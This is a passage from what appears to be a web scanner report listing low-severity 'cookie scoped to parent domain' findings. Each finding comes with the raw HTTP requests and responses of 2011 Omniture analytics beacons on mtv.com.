GET /b/ss/viamtv/1/H.22.1/s21898508197627?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A17%201%20300&ce=UTF-8&pageName=%2Fmusic%2Fmain%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&r=http%3A%2F%2Fwww.mtv.com%2F&ch=music&events=event16&h2=music%2Fmain%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=music&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fhome%2Findex.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/music/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:24 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A894-4D61-092361A4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www49
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.30. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s23534710153471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s23534710153471

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s23534710153471?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A15%3A27%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF5F223[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:16:29 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:16:29 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:16:29 GMT
Last-Modified: Wed, 15 Jun 2011 00:16:29 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A85D-1547-1711EEF9"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.31. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25478533639106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25478533639106

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25478533639106?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A18%3A36%201%20300&ce=UTF-8&pageName=%2Fonair%2Fteen_wolf%2Fseries.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&r=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&ch=onair&events=event16&h2=onair%2Fteen_wolf%2Fseries.jhtml&c5=non-member&c6=not%20logged-in&c15=teen_wolf&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=onair&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:03 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8F7-7E60-4A81F956"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.32. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s25953703850973  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s25953703850973

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s25953703850973?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A34%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Fgame%2Fplay.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2Fgame%2Fplay.jhtml%3FarcadeGameId%3D10325912&r=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ch=games&events=event16&h2=games%2Farcade%2Fgame%2Fplay.jhtml&c5=non-member&c6=not%20logged-in&c23=exit_path&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:35 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:35 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A917-4E09-0C2AA9D0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www88
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.33. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s26489939151797  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s26489939151797

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s26489939151797?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A28%3A16%201%20300&ce=UTF-8&pageName=%2Fhome%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2F&ch=home&events=event16&h2=home%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:28:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:28:56 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:28:56 GMT
Last-Modified: Wed, 15 Jun 2011 00:28:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6AB48-5AA3-24128C5D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www117
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.34. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27362804291769

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27362804291769?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A16%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&r=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ch=games&events=event16&h2=games%2Farcade%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fonair%2Fteen_wolf%2Fseries.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:23 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:23 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:23 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A90B-23E7-27C8BEE7"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www171
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
11.35. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27566767793614

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27566767793614?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A54%201%20300&ce=UTF-8&pageName=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml%23id%3D1518072&r=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ch=videos&events=event16&c1=Mike%20Taylor&h2=videos%2Fmike-taylor%2F659420%2Fperfect.jhtml&c5=non-member&c6=not%20logged-in&c16=mv&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=videos&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; 